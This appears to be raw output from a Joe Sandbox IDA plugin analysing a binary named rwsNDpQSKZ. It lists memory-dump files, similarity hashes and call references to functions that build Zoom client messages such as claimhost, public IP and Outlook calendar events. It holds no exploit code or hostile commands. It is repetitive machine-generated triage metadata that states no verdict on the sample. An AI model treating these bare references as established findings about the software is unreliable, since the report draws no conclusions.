                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Result$com.zoom.app.assistant.audio.configure.response
                • API String ID: 4281283084-3713804244
                • Opcode ID: 80058abca5fbcf9c1e5776115cf271fcfd96b6b2bdb1a378e04763ca33f6246c
                • Instruction ID: 8b0c0ef08330d46db4e96b9cbfdffdc42e7a77a724bd012edad91b3f7281259c
                • Opcode Fuzzy Hash: 80058abca5fbcf9c1e5776115cf271fcfd96b6b2bdb1a378e04763ca33f6246c
                • Instruction Fuzzy Hash: 1DE0D8B0A403C467D710BB158C46B2F76E8A780B19F88446DB2445B382CBF44800EB74
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74BB7
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cdnUpdateSuperNodeMaxLoad,0000279D,max_load,00000004), ref: 00C74BD2
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.cdnUpdateSuperNodeMaxLoad$max_load
                • API String ID: 4281283084-4287560878
                • Opcode ID: 33b08d71b4d36d961550ae37ec05fbb2b4a82364c15ed1d8c5d98f4f230a3cb1
                • Instruction ID: 038f05f81261a3b21003122dd6d1ea9675dd537e8f26b0f20332f2f135a888da
                • Opcode Fuzzy Hash: 33b08d71b4d36d961550ae37ec05fbb2b4a82364c15ed1d8c5d98f4f230a3cb1
                • Instruction Fuzzy Hash: F1E0D8B0A04740A7D7307B145C49B5E26A4AB5071AF904D28B2065E3D2CBF44D85EB74
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74B57
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cdnInfo,0000279B,ecdn_info,00000004), ref: 00C74B72
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.cdnInfo$ecdn_info
                • API String ID: 3166440930-524624299
                • Opcode ID: b32e9e0b504e1444a747325c8294bce37141c926a8c60e8c9103504d358f5913
                • Instruction ID: 49d69350cc44d31dd869e8e0708f129f6d8399afca4f627886868bb3ef37f928
                • Opcode Fuzzy Hash: b32e9e0b504e1444a747325c8294bce37141c926a8c60e8c9103504d358f5913
                • Instruction Fuzzy Hash: 80E0D8B4A04780A7CB20BB155C55B1E66B4E75071BF404928B5055F392CBF44884D774
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6AB67
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.notifyOpenUrlWithAuth,00002761,Url,00000004), ref: 00C6AB82
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Url$com.Zoom.app.conf.notifyOpenUrlWithAuth
                • API String ID: 3166440930-1448513644
                • Opcode ID: d3befc5d19eaeae6d444c84dc0750d731272f666023eda966c1a0da64b02879a
                • Instruction ID: 959f13455d60f4665e1c85ce8343b3bc526d76f4cf68250ab9f0b6726e8526b3
                • Opcode Fuzzy Hash: d3befc5d19eaeae6d444c84dc0750d731272f666023eda966c1a0da64b02879a
                • Instruction Fuzzy Hash: 96E0D8B5A003C097D7206B149C8DB1E62B4DB5071AF500428B6059F3D1CBF44944D7B6
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6AB07
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.notifyUpgradeAccount,00002733,Parameter,00000004), ref: 00C6AB22
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Parameter$com.Zoom.app.conf.notifyUpgradeAccount
                • API String ID: 3166440930-431621009
                • Opcode ID: ee27831abb30f1012715d5b78dbd2373859a30f642fca6abe3178f46e900653d
                • Instruction ID: 7a37fd1c050e560241b513beb627a41b67b2a699e43e65ae9ebc6a03db7b8d3a
                • Opcode Fuzzy Hash: ee27831abb30f1012715d5b78dbd2373859a30f642fca6abe3178f46e900653d
                • Instruction Fuzzy Hash: 4FE020B090039097C730AB20AC49B1E63B4EF50B1BF44092CB2015F3D1CBF44984D7B9
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72B17
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.onlivetranscriptstatus.notify,00009E93,nStatus,00000004), ref: 00C72B32
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.cci.ccivideo.onlivetranscriptstatus.notify$nStatus
                • API String ID: 4281283084-2687401744
                • Opcode ID: c636b564003c8e58c765b0440d2a924ea722f630ad41658feed7051d92ea8079
                • Instruction ID: e30fe1bc5e220e8ba406d5a58cbe305c77ad5c8625a67a9499a9e85de5777618
                • Opcode Fuzzy Hash: c636b564003c8e58c765b0440d2a924ea722f630ad41658feed7051d92ea8079
                • Instruction Fuzzy Hash: FCE0D870A00380A7DB20FF11DC4576E62B4AB40719F844479B2045F382CBF44901DB74
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74CD7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.vdi.plugin.public.ip,000027BB,public_ip,00000004), ref: 00C74CF2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.vdi.plugin.public.ip$public_ip
                • API String ID: 3166440930-2705417876
                • Opcode ID: c9a3e507c758eda717e15d2be0c32edccb69c0d2bed911663d25476a796650a0
                • Instruction ID: ac3993e6ebee9bc04a28c4c543f4d6e52d49dd60b80cfd0f93aab11f6a1a5f7a
                • Opcode Fuzzy Hash: c9a3e507c758eda717e15d2be0c32edccb69c0d2bed911663d25476a796650a0
                • Instruction Fuzzy Hash: 49E0D8B0A0079097D7206B158C49F1E66B49754B1AF444469BA155B3D1CBF44844DF79
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6ACF7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C6AD12
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: HostSnsType$com.Zoom.app.conf.claimhost
                • API String ID: 4281283084-1563626713
                • Opcode ID: 98104092674f2e5f80e42c55b3ef9079a7f88ddcc7a559862a28a5bf060ebe75
                • Instruction ID: 2b0b7526e107898caa0292d01c8e2dde28bfb8ed4263bf90fbbd2936a59aa462
                • Opcode Fuzzy Hash: 98104092674f2e5f80e42c55b3ef9079a7f88ddcc7a559862a28a5bf060ebe75
                • Instruction Fuzzy Hash: 0DE0D870A00390A7D710BF149C4971E33A4DB54B19F800428B2055F381CFF84D05E7B5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74C17
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cdnSetBackupSuperNodeInfo,000027A6,data,00000004), ref: 00C74C32
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.cdnSetBackupSuperNodeInfo$data
                • API String ID: 3166440930-1690969339
                • Opcode ID: 85ba74033bbc0e4e02074610ceedcb02d731e78f587f400650ca8e5f4d2aac0d
                • Instruction ID: ea86b960f45bfa4a8e19d4562358d270fbf778be4594c57f32cc021c27d8d095
                • Opcode Fuzzy Hash: 85ba74033bbc0e4e02074610ceedcb02d731e78f587f400650ca8e5f4d2aac0d
                • Instruction Fuzzy Hash: 35E0DFB0A00780A7DB20BB10AC85B1E76B8AB90B1AF604538B2165A3D6CBF44984D7B5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6ADF7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.updateLCP,00002736,B64String,00000004), ref: 00C6AE12
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
